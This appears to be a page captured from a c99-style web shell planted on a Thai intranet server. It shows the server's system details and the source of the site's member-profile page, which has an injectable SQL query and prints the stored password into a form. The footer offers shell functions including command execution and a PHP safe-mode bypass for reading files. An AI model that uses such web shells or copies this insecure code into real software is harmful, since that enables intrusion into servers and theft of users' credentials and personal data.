Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/intranet/ drwxrwxrwx |
Viewing file: Select action/file-type: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-874"> <link href="style.css" rel="stylesheet" type="text/css"> <title>-== : ÂÔ¹´Õµé͹ÃѺÃкº Intranet BCNU : ==-</title> </head> <body leftmargin="0" rightmargin="0" topmargin="0" bottommargin="0"> <table width="755" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2" align="center"><?php include("header.php");?></td> </tr> <tr> <td colspan="2" background="images/bg_table.png" height="30"><div align="right" class="f3"> ÂÔ¹´Õµé͹ÃѺ </div></td> </tr> <tr> <td width="30%" bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td align="center" valign="top" bgcolor="#FFEECC"><?php include("menu_member.php");?></td> <td valign="top" bgcolor="#FFFFFF"> <?php connDB(); $sql="select * from person where pid='$pid' " ; $result=mysql_query($sql); $record=mysql_fetch_array($result); ?> <form action="redir.php" method="post" enctype="application/x-www-form-urlencoded" name="frmLogin" id="frmLogin"> <table width="90%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td><img src="images/profile.gif" width="200" height="58"></td> </tr> <td height="20" bgcolor="#FFFFFF" class="f6"> <table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="#E3F0FC"> <tr> <td width="30%" height="22" bgcolor="#FFFFFF" class="f7" align="right">username </td> <td width="70%" bgcolor="#FFFFFF" class="f6"> <?=$record[uid]; ?></td> </tr> <tr> <td bgcolor="#FFFFFF" class="f7" align="right">password </td> <td bgcolor="#FFFFFF"><input name="pwd" type="password" id="txtRent" maxlength="200" value="<?=$record[password]?>"></td> </tr> <tr> <td bgcolor="#FFFFFF" class="f7" align="right">ª×èÍ </td> <td bgcolor="#FFFFFF"><input type="text" name="fname" value="<?=$record['fname']?>"></td> </tr> <tr> <td bgcolor="#FFFFFF" class="f7" align="right">¹ÒÊ¡ØÅ </td> <td bgcolor="#FFFFFF"><input type="text" name="lname" value="<?=$record['lname']?>"></td> </tr> <tr> <td bgcolor="#FFFFFF" class="f7" align="right">·ÕèÍÂÙè </td> <td bgcolor="#FFFFFF"><input type="text" name="address" value="<?=$record['address']?>"></td> </tr> <tr> <td bgcolor="#FFFFFF" class="f7" align="right">ÍÕ-àÁÅÅì </td> <td bgcolor="#FFFFFF"><input type="text" name="email" value="<?=$record['email']?>"></td> </tr> <tr> <td bgcolor="#FFFFFF" class="f7"> </td> <td height="35" bgcolor="#FFFFFF"><input type="submit" name="Submit" value="ºÑ¹·Ö¡"></td> </tr> </table></td> </tr> </table></form></td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td bgcolor="#FFEECC"> </td> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td colspan="2" align="center"><?php include("footer.php");?></td> </tr> </table> </body> </html> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]-- |